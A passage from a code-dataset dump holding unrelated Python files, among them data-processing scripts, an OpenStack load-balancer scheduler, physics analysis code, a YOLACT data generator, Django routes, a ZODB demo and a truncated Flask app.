),\n ('video',\n agate.Formula(agate.Text(), lambda row: base_url + row['archive_id'] + '/' + row['archive_id'] + '.mp4')\n ),\n ('transcript',\n agate.Formula(agate.Text(), lambda row: base_url + row['archive_id'] + '/transcript.txt')\n ),\n ('for_candidate',\n agate.Formula(agate.Text(), get_candidate_from_sponsors)\n )\n ])\n \n # write full appended data set (only write columns that are useful for all spot analysis)\n custom = with_new_fields.exclude(['market','start_time','end_time','video','transcript','embed_url'])\n custom.to_csv(io + 'bos_custom.csv')\n\n # unique ads for meta info, remove things that pertain to specific spot airing\n unique = with_new_fields.distinct('archive_id')\n unique_select = unique.select(['archive_id','sponsor','candidate','for_candidate','embed_url','video','transcript'])\n unique_select.to_csv(io + 'ads.csv')\n\n # json for downloading video script \n unique.select(['archive_id', 'video', 'transcript']).to_json(io + 'ads.json')\n","sub_path":"data/scripts/python/custom.py","file_name":"custom.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"307188699","text":"##############################################################################\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n#\n# Copyright 2014 by F5 Networks and/or its suppliers. All rights reserved.\n##############################################################################\n\nfrom neutron.services.loadbalancer import agent_scheduler\nfrom neutron.openstack.common import log as logging\n\nLOG = logging.getLogger(__name__)\n\nimport random\n\n\nclass TenantScheduler(agent_scheduler.ChanceScheduler):\n \"\"\"Allocate a loadbalancer agent for a pool based on tenant_id.\n or else make a random choice.\n \"\"\"\n\n def schedule(self, plugin, context, pool):\n \"\"\"Schedule the pool to an active loadbalancer agent if there\n is no enabled agent hosting it.\n \"\"\"\n with context.session.begin(subtransactions=True):\n lbaas_agent = plugin.get_lbaas_agent_hosting_pool(\n context, pool['id'])\n if lbaas_agent:\n LOG.debug(_('Pool %(pool_id)s has already been hosted'\n ' by lbaas agent %(agent_id)s'),\n {'pool_id': pool['id'],\n 'agent_id': lbaas_agent['id']})\n return\n\n candidates = plugin.get_lbaas_agents(context, active=True)\n if not candidates:\n LOG.warn(_('No active lbaas agents for pool %s'), pool['id'])\n return\n\n chosen_agent = None\n for candidate in candidates:\n assigned_pools = plugin.list_pools_on_lbaas_agent(\n context, candidate['id'])\n for assigned_pool in assigned_pools['pools']:\n if pool['tenant_id'] == assigned_pool['tenant_id']:\n chosen_agent = candidate\n break\n if chosen_agent:\n break\n\n if not chosen_agent:\n chosen_agent = random.choice(candidates)\n\n binding = agent_scheduler.PoolLoadbalancerAgentBinding()\n binding.agent = chosen_agent\n binding.pool_id = pool['id']\n context.session.add(binding)\n LOG.debug(_('Pool %(pool_id)s is scheduled to '\n 'lbaas agent %(agent_id)s'),\n {'pool_id': pool['id'],\n 'agent_id': chosen_agent['id']})\n return chosen_agent\n","sub_path":"neutron/services/loadbalancer/drivers/f5/agent_scheduler.py","file_name":"agent_scheduler.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"540460232","text":"# I will use Euclidean algorithm to calculate GCD and LCM\r\n# https://en.wikipedia.org/wiki/Euclidean_algorithm\r\n\r\n\r\ndef GCD(a,b): # by Euclidean algorithm to calculate GCD I should calculate the remainder of a/b (a>b)\r\n if a%b ==0: # if the remainder of a/b is zero b is GCD of original a&b\r\n return b\r\n else: # else should calculate b and the remainder of a/b's GCD to calculate the GCD of original a&b\r\n return GCD(b,a%b) # Recursion function\r\n\r\n\r\ndef LCM(a,b): # LCM is the \"Least Common Multiple\" so GCD x each numbers remainder that comes from num/GCD is LCM\r\n return int(a*b/GCD(a,b))\r\n\r\n\r\ninput_numbers = list(map(int, input(\"Please Enter two integers: \").split(' '))) #input 2 numbers with spacing between numbers\r\n# split by spacing and make string list to int list by using map and list method\r\ninput_numbers.sort(reverse=True) # sort the list by descending order\r\nprint(\"LCM : {} GCD : {}\".format(LCM(input_numbers[0], input_numbers[1]), GCD(input_numbers[0], input_numbers[1])))\r\n","sub_path":"Junior_1st_Semester/Artificial_Intelligence_Project/hw/2016314726_정영준_week1_hw3.py","file_name":"2016314726_정영준_week1_hw3.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"343745139","text":"'''Дан файл. Определите сколько в нем букв (латинского алфавита), слов, строк.\nВыведите три найденных числа в формате, приведенном в примере.\n'''\nwith open(\"input.txt\", \"r\") as f:\n ALL = list()\n for line in f.readlines():\n if line[0] == \"\\n\":\n continue\n L = list(line.strip('.\\n').split())\n ALL.append(L)\n count_words = 0\n count_letters = 0\n for line in ALL:\n count_words += len(line)\n for word in line:\n count_letters += len(word)\n print(count_letters, \"letters\")\n print(count_words, \"words\")\n print(len(ALL), \"lines\")\n","sub_path":"tasks/Files_Tasks/Task3.py","file_name":"Task3.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"144981109","text":"import pandas as pd\n\n\ndf = pd.read_csv(\"./csv/1_sentence_tokenized_reviews.csv\")\nsentence_tokenized_reviews = df.values\n\n\n# 구두점 정제\nimport re\n\n\npunct = \"/-'?!.,#$%\\'()*+-/:;<=>@[\\\\]^_`{|}~\" + '\"\"“”’' + '∞θ÷α•à−β∅³π‘₹´°£€\\×™√²—–&'\npunct_mapping = {\"‘\": \"'\", \"₹\": \"e\", \"´\": \"'\", \"°\": \"\", \"€\": \"e\", \"™\": \"tm\", \"√\": \" sqrt \", \"×\": \"x\", \"²\": \"2\", \"—\": \"-\", \"–\": \"-\", \"’\": \"'\", \"_\": \"-\", \"`\": \"'\", '“': '\"', '”': '\"', '“': '\"', \"£\": \"e\", '∞': 'infinity', 'θ': 'theta', '÷': '/', 'α': 'alpha', '•': '.', 'à': 'a', '−': '-', 'β': 'beta', '∅': '', '³': '3', 'π': 'pi', }\n\n\ndef clean_punc(text, punct, mapping):\n for p in mapping:\n text = re.sub(p, mapping[p], text)\n \n # for p in punct:\n # text = re.sub(p, f' {p} ', text)\n \n specials = {'\\u200b': ' ', '…': ' ... ', '\\ufeff': '', 'करना': '', 'है': ''}\n for s in specials:\n text = re.sub(s, specials[s], text)\n \n return text.strip()\n\n\ncleaned_reviews = []\nfor sentence_tokenized_review in sentence_tokenized_reviews:\n\n cleaned_review = []\n for sent in sentence_tokenized_review:\n cleaned_review.append(clean_punc(str(sent), punct, punct_mapping))\n\n cleaned_reviews.append(cleaned_review)\n\n\ndf = pd.DataFrame(sentence_tokenized_reviews)\ndf.to_csv(\"./csv/2_cleaned_reviews.csv\", index=False)","sub_path":"pjt2/MechineLearning/etc/사전학습/전처리/test2/2_cleaned.py","file_name":"2_cleaned.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"295138333","text":"from labrad.server import LabradServer, setting\n\nclass ExternalServer(LabradServer):\n \"\"\"External Server to test the blocking funtion.\"\"\"\n name = \"External Server\"\n\n currentNumber = 0\n\n def updateNumber(self):\n self.currentNumber += 1\n\n @setting(10, \"Get Number\", returns=\"i\")\n def getNumber(self, c, data):\n \"\"\"Update and get the number.\"\"\"\n self.updateNumber()\n return self.currentNumber\n\nif __name__ == \"__main__\":\n from labrad import util\n util.runServer(ExternalServer())","sub_path":"old_files/scriptcontrol/prototype/externalserver.py","file_name":"externalserver.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"57942757","text":"import sys\nsys.path.append(\"/Users/njlindsey/Workspace/projectsBerkeley/AmbientNoiseGreenFunctions/\")\nimport progs.core as core\nimport progs.eigCalc as eigCalc\nimport progs.eigPlot as eigPlot\nimport numpy as np\n\n\n#inputs\nmodelfile=\"MODEL.01\"\ndistancefile=\"DIST\"\nfreqfile=\"FREQ\"\n\n#generate array of frequencies\nfreqs=core.mungeFreq(freqfile)\n\n#generate eignenfunctions using CPS\neigCalc.calcLove(modelfile,distancefile,freqfile)\neigCalc.calcRay(modelfile,distancefile,freqfile)\n\n#read eigenfunctions from ascii into a numpy array\nwith open('SLDER.TXT','r') as lovedispfile:\n [headerL,paramsL,dataL]=eigCalc.mungeEig(lovedispfile)\nwith open('SRDER.TXT','r') as raydispfile:\n [headerR,paramsR,dataR]=eigCalc.mungeEig(raydispfile)\n\n#plot dispersion\nfig1=eigPlot.Dispersion(freqs,paramsL,paramsR);\n\n#plot eigenfunctions\nfig2=eigPlot.Eigenfunctions(freqs,headerL,headerR,dataL,dataR);\n","sub_path":"tests/GIL7/eigCalcRun.py","file_name":"eigCalcRun.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"623625592","text":"import os\nimport sys\nimport argparse\nimport numpy as np\nimport subprocess\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nsys.path.append('lib/')\nimport analysis_utils as au\nfrom scipy.optimize import curve_fit\n\n#### define macros #########\nI=complex(0.,1.)\nsqrt=np.sqrt\nlog=np.log\nfrom math import pi as PI\nmatr = np.matrix\n###########################\n\ngt_ch = np.array([[ 0, 0, -1, 0],\n [ 0, 0, 0, -1],\n [ -1, 0, 0, 0],\n [ 0, -1, 0, 0]])\n\ng5_ch = np.array([[ 1, 0, 0, 0],\n [ 0, 1, 0, 0],\n [ 0, 0,-1, 0],\n [ 0, 0, 0,-1]])\n\nProj = 0.25*(np.eye(4) + gt_ch)\n\ndef assertions(args):\n parameters={}\n parameters['listConfs'] = args['listConfs']\n parameters['twop'] = args['twop']\n parameters['threep'] = args['threep']\n parameters['L'] = int(args['L'])\n parameters['T'] = int(args['T'])\n parameters['binsize'] = int(args['binsize'])\n parameters['tsink'] = int(args['tsink'])\n parameters['fitMassLow'] = int(args['fitMassLow'])\n parameters['fitMassHgh'] = int(args['fitMassHgh'])\n parameters['fitThpLow'] = int(args['fitThpLow'])\n parameters['fitThpHgh'] = int(args['fitThpHgh'])\n parameters['momentum'] = int(args['momentum'])\n\n assert parameters['L']>0\n assert parameters['T']>0\n assert parameters['binsize']>0\n assert parameters['tsink']>=0 and parameters['tsink'] < parameters['T']/2\n assert parameters['fitMassLow'] >0 and parameters['fitMassLow'] < parameters['T']/2\n assert parameters['fitMassHgh'] >0 and parameters['fitMassHgh'] < parameters['T']/2 and parameters['fitMassHgh'] > parameters['fitMassLow']\n assert parameters['fitThpLow'] > 0 and parameters['fitThpLow'] < parameters['tsink']\n assert parameters['fitThpHgh'] > 0 and parameters['fitThpHgh'] < parameters['tsink'] and parameters['fitThpHgh'] > parameters['fitThpLow']\n assert parameters['momentum'] > 0\n\n return parameters\n##################################################\n\ndef main(argv=None):\n if argv is None:\n argv = sys.argv\n\n parser = argparse.ArgumentParser(prog='PDFs Helicity', description='This code analyzes the PDFs for the helicity')\n parser.add_argument('--listConfs', help='Takes the list of configurations that we want to analysze', default = 'list_confs.txt')\n parser.add_argument('--twop', help='Takes the prefix of the twop point function names for zero momentum', default = 'twop')\n parser.add_argument('--threep', help='Takes the prefix of the threep point function names', default = 'threep')\n parser.add_argument('--L', help='Spatial Lattice Extent', default = 16)\n parser.add_argument('--T', help='Temporal Lattice Extent', default = 32)\n parser.add_argument('--binsize', help='The binsize needed for the binning procedure', default = 1)\n parser.add_argument('--fitMassLow', help='Lower fit range for effective mass', default = 5)\n parser.add_argument('--fitMassHgh', help='Higher fit range for effective mass', default = 10)\n parser.add_argument('--tsink', help='Time slice where we fix the sink', default = 6)\n parser.add_argument('--fitThpLow', help='Lower fit range for three point ratio', default = 2)\n parser.add_argument('--fitThpHgh', help='Higher fit range for three point ratio', default = 4)\n parser.add_argument('--momentum', help='The momentum that we boost the nucleon', default = 1)\n args = vars(parser.parse_args())\n\n parameters=assertions(args)\n\n momP='+' + str(parameters['momentum'])\n momM='-' + str(parameters['momentum'])\n lMomenta=[[momP,'+0','+0'], ['+0',momP,'+0'], ['+0','+0',momP], [momM,'+0','+0'], ['+0',momM,'+0'], ['+0','+0',momM]]\n ldir=['x','y','z','x','y','z']\n lProj=['4','5','6','4','5','6']\n\n # read configurations list\n lenConf=au.file_len(parameters['listConfs'])\n with open(parameters['listConfs'],'r') as fp:\n listConfs = list(map(lambda x: x.strip(),fp.readlines()))\n if len(set(listConfs)) != lenConf:\n sys.stderr.write('Error there are duplicate confs in the list')\n sys.exit(-1)\n\n if lenConf % parameters['binsize'] != 0:\n sys.stderr.write('Error number of configurations is not divisible with the binsize: Manually discard confs to make it')\n sys.exit(-1) \n\n # read the two point functions for the zero momentum from where we extract the effective mass\n twopRaw_mom0=[]\n for iconf in listConfs:\n twopName = parameters['twop'] + iconf + '/twop_proton_mom_+0_+0_+0_zeta_-0.6000_dir_x.dat'\n lenFile = au.file_len(twopName)\n explen = parameters['T'] * 4\n if lenFile != explen:\n sys.stderr.write('Error wrong number of lines in %s' % (twopName))\n sys.exit(-1)\n arr=np.loadtxt(twopName, usecols=(2,3,4,5,6,7,8,9))\n arr=np.array(list(map(lambda x: [ complex(x[0],x[1]), complex(x[2],x[3]), complex(x[4],x[5]), complex(x[6],x[7]) ] , arr)))\n arr=arr.reshape(parameters['T'], 4, 4)\n arr_proj=np.array(list(map(lambda x: (matr(Proj)*matr(x)).trace().item() , arr)))\n twopRaw_mom0.append(arr_proj.real)\n\n twopRaw_mom0=np.array(twopRaw_mom0).reshape(lenConf,parameters['T'])\n twopBinning_mom0=au.binning(twopRaw_mom0, parameters['binsize'])\n Nbins=len(twopBinning_mom0)\n massEffBinning=au.effMass(twopBinning_mom0)\n meanEffMass=np.average(massEffBinning,axis=0)\n errEffMass=sqrt(Nbins-1) * np.std(massEffBinning,axis=0)\n massBin=[]\n for Arr in massEffBinning:\n Lw=parameters['fitMassLow']\n Hg=parameters['fitMassHgh']\n popt,pconv = curve_fit(lambda x,a: a, np.arange(Lw, Hg+1), Arr[Lw:Hg+1] , sigma=errEffMass[Lw:Hg+1])\n massBin.append(popt[0])\n\n EnerBin=sqrt(np.array(massBin)**2 + (parameters['momentum']*(2.*PI/parameters['L']))**2 )\n\n # read the twop point functions for non zero momentum\n twopRaw_momi=[]\n for iconf in listConfs:\n for lM,li in zip(lMomenta, ldir):\n twopName = parameters['twop'] + iconf + '/twop_proton_mom_' + lM[0] + '_' + lM[1] + '_' + lM[2] + '_zeta_-0.6000_dir_' + li + '.dat'\n lenFile = au.file_len(twopName)\n explen = parameters['T'] * 4\n if lenFile != explen:\n sys.stderr.write('Error wrong number of lines in %s' % (twopName))\n sys.exit(-1)\n arr=np.loadtxt(twopName, usecols=(2,3,4,5,6,7,8,9))\n arr=np.array(list(map(lambda x: [ complex(x[0],x[1]), complex(x[2],x[3]), complex(x[4],x[5]), complex(x[6],x[7]) ] , arr)))\n arr=arr.reshape(parameters['T'], 4, 4)\n arr_proj=np.array(list(map(lambda x: (matr(Proj)*matr(x)).trace().item() , arr)))\n twopRaw_momi.append(arr_proj.real)\n\n twopRaw_momi=np.array(twopRaw_momi).reshape(lenConf,len(ldir),parameters['T'])\n\n twopBinning_momi=np.array(au.binning(twopRaw_momi, parameters['binsize']))\n Nbins=len(twopBinning_momi)\n\n #read the three point functions\n # convention of the format\n# 2,3-> dpart (re,im) +z\n# 4,5-> dpart (re,im) -z\n# 6,7-> upart (re,im) +z\n# 8,9-> upart (re,im) -z\n NDZ=int(parameters['L']/2)\n threep=[]\n for iconf in listConfs:\n for lM,li,lPr in zip(lMomenta, ldir, lProj):\n threepName = parameters['threep'] + iconf + '/threep_mom_' + lM[0] + '_' + lM[1] + '_' + lM[2] + '_zeta_-0.6000_dir_' + li + '_proj_' + lPr + '.dat'\n lenFile = au.file_len(threepName)\n explen = parameters['T'] * NDZ\n if lenFile != explen:\n sys.stderr.write('Error wrong number of lines in %s' % (threepName))\n sys.exit(-1)\n arr=np.loadtxt(threepName, usecols=(2,3,4,5,6,7,8,9))\n arr=np.array(list(map(lambda x: [ complex(x[0],x[1]), complex(x[2],x[3]), complex(x[4],x[5]), complex(x[6],x[7]) ] , arr))) # make complex\n arr=np.array(list(map(lambda x: [ x[2]-x[0], x[3]- x[1] ] , arr))) # create isovector combination\n threep.append(arr)\n threep=np.array(threep).reshape(lenConf, len(ldir), parameters['T'], NDZ, 2)\n\n threepBinning = np.array(au.binning(threep, parameters['binsize']))\n\n # create the ratio\n ratioBinning=np.zeros(threepBinning.shape, dtype=np.complex128)\n for ibin in range(Nbins):\n for dir in range(len(ldir)):\n if ldir[dir] == 'x':\n ip=0\n elif ldir[dir] == 'y':\n ip=1\n elif ldir[dir] == 'z':\n ip=2\n else:\n sys.exit(-1)\n nP=int(lMomenta[dir][ip])\n C=(2*massBin[ibin]**2) / (EnerBin[ibin]*(EnerBin[ibin]+massBin[ibin])) \n factor=I*(2*massBin[ibin]**2)/ ((EnerBin[ibin]*massBin[ibin]+massBin[ibin]**2+(nP*(2.*PI/parameters['L']))**2)*C)\n for it in range(parameters['T']):\n for idz in range(NDZ):\n for fd in range(2):\n ratioBinning[ibin, dir, it, idz, fd] = factor * (threepBinning[ibin, dir, it, idz, fd] / twopBinning_momi[ibin, dir, parameters['tsink']])\n\n ratio_bmean=np.average(ratioBinning, axis=0)\n errRatio=sqrt(Nbins-1) * ( np.std(ratioBinning.real, axis=0) + 1j*np.std(ratioBinning.imag, axis=0) )\n\n h_MA=[]\n for ibin in range(Nbins):\n for dir in range(len(ldir)):\n for idz in range(NDZ):\n for fd in range(2):\n Lw=parameters['fitThpLow']\n Hg=parameters['fitThpHgh']\n popt_r, pconv_r = curve_fit(lambda x,a: a, np.arange(Lw, Hg+1), ratioBinning[ibin,dir,Lw:Hg+1,idz,fd].real , sigma=errRatio[dir,Lw:Hg+1,idz,fd].real)\n popt_i, pconv_i = curve_fit(lambda x,a: a, np.arange(Lw, Hg+1), ratioBinning[ibin,dir,Lw:Hg+1,idz,fd].imag , sigma=errRatio[dir,Lw:Hg+1,idz,fd].imag)\n h_MA.append(popt_r[0] + 1j*popt_i[0])\n\n h_MA=np.array(h_MA).reshape(Nbins,len(ldir),NDZ,2)\n h_MA_bmean=np.average(h_MA,axis=0)\n err_h_MA=sqrt(Nbins-1) * ( np.std(h_MA.real, axis=0) + 1j*np.std(h_MA.imag, axis=0) )\n\n\n\n for dir in range(len(ldir)):\n for idz in range(NDZ):\n print('%d %d \\t %+e %+e \\t %+e %+e' % (dir, -idz, h_MA_bmean[dir,idz,1].real, err_h_MA[dir,idz,1].real, h_MA_bmean[dir,idz,1].imag, err_h_MA[dir,idz,1].imag) )\n for idz in range(NDZ):\n print('%d %d \\t %+e %+e \\t %+e %+e' % (dir, idz, h_MA_bmean[dir,idz,0].real, err_h_MA[dir,idz,0].real, h_MA_bmean[dir,idz,0].imag, err_h_MA[dir,idz,0].imag) )\n print('\\n')\n\n\n ratioBinningAver=( (ratioBinning[:, 0, :, :, :].real + ratioBinning[:, 1, :, :, :].real + ratioBinning[:, 2, :, :, :].real + (ratioBinning[:, 3, :, :, :].real + ratioBinning[:, 4, :, :, :].real + ratioBinning[:, 5, :, :, :].real)) + 1j*(ratioBinning[:, 0, :, :, :].imag + ratioBinning[:, 1, :, :, :].imag + ratioBinning[:, 2, :, :, :].imag - (ratioBinning[:, 3, :, :, :].imag + ratioBinning[:, 4, :, :, :].imag + ratioBinning[:, 5, :, :, :].imag)) )/6\n\n ratioAver_bmean=np.average(ratioBinningAver, axis=0)\n errRatioAver=sqrt(Nbins-1) * ( np.std(ratioBinningAver.real, axis=0) + 1j*np.std(ratioBinningAver.imag, axis=0) )\n\n h_MA=[]\n for ibin in range(Nbins):\n for idz in range(NDZ):\n for fd in range(2):\n Lw=parameters['fitThpLow']\n Hg=parameters['fitThpHgh']\n popt_r, pconv_r = curve_fit(lambda x,a: a, np.arange(Lw, Hg+1), ratioBinningAver[ibin,Lw:Hg+1,idz,fd].real , sigma=errRatioAver[Lw:Hg+1,idz,fd].real)\n popt_i, pconv_i = curve_fit(lambda x,a: a, np.arange(Lw, Hg+1), ratioBinningAver[ibin,Lw:Hg+1,idz,fd].imag , sigma=errRatioAver[Lw:Hg+1,idz,fd].imag)\n h_MA.append(popt_r[0] + 1j*popt_i[0])\n\n h_MA=np.array(h_MA).reshape(Nbins,NDZ,2)\n h_MA_bmean=np.average(h_MA,axis=0)\n err_h_MA=sqrt(Nbins-1) * ( np.std(h_MA.real, axis=0) + 1j*np.std(h_MA.imag, axis=0) )\n\n print('average')\n for idz in range(NDZ):\n print('%d \\t %+e %+e \\t %+e %+e' % (-idz, h_MA_bmean[idz,1].real, err_h_MA[idz,1].real, h_MA_bmean[idz,1].imag, err_h_MA[idz,1].imag) )\n for idz in range(NDZ):\n print('%d \\t %+e %+e \\t %+e %+e' % (idz, h_MA_bmean[idz,0].real, err_h_MA[idz,0].real, h_MA_bmean[idz,0].imag, err_h_MA[idz,0].imag) )\n\n # print real part\n plt.figure()\n if au.which('latex'):\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n\n plt.ylabel(r\"Re[h]\")\n plt.xlabel(r\"z\")\n plt.errorbar(np.arange(-NDZ+1,NDZ) , np.concatenate((np.flipud(h_MA_bmean[:,1].real), h_MA_bmean[1:,0].real)) , yerr=np.concatenate((np.flipud(err_h_MA[:,1].real), err_h_MA[1:,0].real)), fmt='o', color='red')\n plt.savefig('PDFs_helicity_real_Nc'+str(lenConf)+'ts'+str(parameters['tsink'])+'mom'+str(parameters['momentum'])+'.pdf', format='pdf')\n\n\n # print imaginary part\n # flip +z <-> -z\n plt.figure()\n if au.which('latex'):\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif') \n plt.ylabel(r\"Im[h]\")\n plt.xlabel(r\"z\")\n plt.errorbar(np.arange(-NDZ+1,NDZ) , np.flipud(np.concatenate((np.flipud(h_MA_bmean[:,1].imag), h_MA_bmean[1:,0].imag))) , yerr=np.flipud(np.concatenate((np.flipud(err_h_MA[:,1].imag), err_h_MA[1:,0].imag))), fmt='o', color='red')\n plt.savefig('PDFs_helicity_imag_Nc'+str(lenConf)+'ts'+str(parameters['tsink'])+'mom'+str(parameters['momentum'])+'.pdf', format='pdf')\n\n############################ \nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"PDFs_helicity.py","file_name":"PDFs_helicity.py","file_ext":"py","file_size_in_byte":13497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"217505306","text":"import os, sys\nROOT_DIR = os.path.abspath(\"../\")\nsys.path.append(ROOT_DIR)\n#from skimage import draw\nimport MaskRCNNExperiment.GeometryDataset_on_the_fly_gen as euclidea_datagen\n#import YolactExperiment.data.coco as cocodataset\n\nfrom YolactExperiment.utils.augmentations import *\nimport numpy as np\nimport torch\nimport torch.utils.data as data\nfrom enviroment_utils import EnvironmentUtils as env_utils\n\nclass Yolact_datagen(data.Dataset):\n\n def __init__(self, args):\n self.euclidea = euclidea_datagen.GeometryDataset_on_the_fly_gen(args)\n self.transform = BaseTransform()\n self.len = args.epoch_size\n self.name= \"euclidea\"\n def __len__(self):\n return self.len\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n Returns:\n tuple: Tuple (image, (target, masks, num_crowds)).\n target is the object returned by ``coco.loadAnns``.\n \"\"\"\n im, gt, masks, h, w, num_crowds = self.pull_item(index)\n return im, (gt, masks, num_crowds)\n def pull_item(self, index):\n index = int(index)\n img, masks, classes = self.load_image_and_mask(index)\n\n #vizualization: to check images before\n #from mrcnn import visualize\n #im = visualize.display_top_masks(img, masks, classes, list(self.euclidea.id_name_dic.keys()))\n #im.close()\n\n #derive bboxes\n bboxes = self.extract_bboxes(masks)\n # IS it LIKE this or 2,1,0 ???\n masks = masks.transpose((2, 0, 1))\n num_crowds = 0\n height, width, _ = img.shape\n scale = np.array([width, height, width, height])\n target = []\n for i in range(len(classes)):\n bbox = bboxes[i]\n final_box = list(bbox/scale)\n final_box.append(classes[i])\n target.append(final_box)\n\n if self.transform is not None:\n if len(target) > 0:\n target = np.array(target)\n img, masks, boxes, labels = self.transform(img, masks, target[:, :4],\n {'num_crowds': 0, 'labels': classes})\n\n # I stored num_crowds in labels so I didn't have to modify the entirety of augmentations\n num_crowds = labels['num_crowds']\n labels = labels['labels']\n\n target = np.hstack((boxes, np.expand_dims(labels, axis=1)))\n return torch.from_numpy(img).permute(2, 0, 1), target, masks, height, width, num_crowds\n\n def load_image_and_mask(self, image_id):\n self.euclidea.number_of_images += 1\n self.euclidea.step_index += 1\n if self.euclidea.done_level:\n self.euclidea.reset_level()\n\n action_tool, action_points = self.euclidea.multi_level.get_construction(self.euclidea.step_index)\n\n if action_tool is None and action_points is None:\n print(\"error in generation\")\n self.euclidea.reset_level()\n self.euclidea.number_of_errors += 1\n action_tool, action_points = self.euclidea.multi_level.get_construction(self.euclidea.step_index)\n\n action_tool_network_index = self.euclidea.id_name_dic[self.euclidea.multi_level.tool_index_to_name[action_tool]]\n\n img = env_utils.build_image_from_multilevel(self.euclidea.multi_level, self.euclidea.history)\n self.euclidea.history.append(img[:, :, 0])\n self.euclidea.execute_action(action_tool, action_points)\n masks, classes = self.euclidea.procces_mask(action_points, action_tool_network_index)\n\n return img, masks, classes\n\n @staticmethod\n def extract_bboxes(masks):\n boxes = np.zeros([masks.shape[-1], 4], dtype=np.int32)\n for i in range(masks.shape[-1]):\n m = masks[:, :, i]\n # Bounding box.\n horizontal_indicies = np.where(np.any(m, axis=0))[0]\n #print(\"np.any(m, axis=0)\", np.any(m, axis=0))\n #print(\"p.where(np.any(m, axis=0))\", np.where(np.any(m, axis=0)))\n vertical_indicies = np.where(np.any(m, axis=1))[0]\n\n if horizontal_indicies.shape[0]:\n x1, x2 = horizontal_indicies[[0, -1]]\n y1, y2 = vertical_indicies[[0, -1]]\n x2 += 1\n y2 += 1\n else:\n x1, x2, y1, y2 = 0, 0, 0, 0\n boxes[i] = np.array([x1, y1, x2, y2])\n\n\n\n return boxes.astype(np.int32)\n def __repr__(self):\n fmt_str = 'Dataset ' + self.__class__.__name__ + '\\n'\n fmt_str += ' Number of datapoints: {}\\n'.format(self.__len__())\n fmt_str += ' Root Location: {}\\n'.format(self.root)\n tmp = ' Transforms (if any): '\n fmt_str += '{0}{1}\\n'.format(tmp, self.transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\n tmp = ' Target Transforms (if any): '\n fmt_str += '{0}{1}'.format(tmp, self.target_transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\n return fmt_str","sub_path":"src/YolactExperiment/euclidea_datagen.py","file_name":"euclidea_datagen.py","file_ext":"py","file_size_in_byte":4999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"505208223","text":"from django.urls import path\n\nfrom main.views import *\n\nurlpatterns = [\n path('', home_page, name='index'),\n path('features', features, name='features'),\n path('faq', faq, name='faq'),\n path('about-us', about_us, name='about-us'),\n path('contact-us', contact_us, name='contact-us'),\n path('gallery', gallery, name='gallery'),\n path('courses', courses, name='courses'),\n path('profile', profile, name='profile'),\n path('contact', contact, name='contact'),\n]","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"417290724","text":"#!/usr/bin/env python3\n# -*-coding: utf-8-*-\n# Author : Chris\n# Blog : http://blog.chriscabin.com\n# GitHub : https://www.github.com/chrisleegit\n# File : zodb_demo.py\n# Date : 16-7-15\n# Version: 0.1\n# Description: \n\nfrom ZODB import FileStorage, DB\nimport transaction\n\n\nclass Database:\n def __init__(self, db_file='db.fs'):\n # `FileStorage` 实际上是将一个数据库映射到无格式文本文件的代理对象。\n # 使用 ZODB 的一般步骤\n self._storage = FileStorage.FileStorage(db_file)\n self._db = DB(self._storage)\n self._root = self._db.open().root()\n\n @property\n def root(self):\n return self._root\n\n def store(self, close=False):\n transaction.commit()\n if close:\n self.close()\n\n def close(self):\n self._storage.close()\n\n def query_all(self):\n for k in self._root.keys():\n print('{} => {}'.format(k, self._root[k]))\n\n\ndef main():\n # 创建一个数据,存储一些 stuff\n stuff_db = Database('stuff.fs')\n\n # 按照类似 `shelve` 的方式存储对象\n stuff_db.root['foo1'] = 'foo bar hello, world'\n stuff_db.root['foo2'] = {'hello': 'world'}\n stuff_db.root['foo3'] = [[1, 2, 3, 4], 'hello']\n\n stuff_db.query_all()\n\n # 存储并关闭数据库\n stuff_db.store(close=True)\n del stuff_db\n\n # 读取数据库\n stuff_db_read = Database('stuff.fs')\n\n # 查看存储的数据\n stuff_db_read.query_all()\n\n # 修改一些数据,然后关闭后再读取\n stuff_db_read.root['foo1'] = 'Boy'\n\n stuff_db_read.store(True)\n\n # 再读出来后查看\n Database('stuff.fs').query_all()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"ch17/zodb/zodb_demo.py","file_name":"zodb_demo.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"349682003","text":"import os\nimport sys\nimport json\nimport logging\nimport linuxcnc\nimport time\nfrom flask_cors import CORS\nfrom flask_mysqldb import MySQL\nfrom werkzeug.utils import secure_filename\nfrom classes.machinekitController import MachinekitController\nfrom flask import Flask, request, jsonify, flash, redirect, url_for, send_from_directory\n# halcmd setp hal_manualtoolchange.change_button true\n\napp = 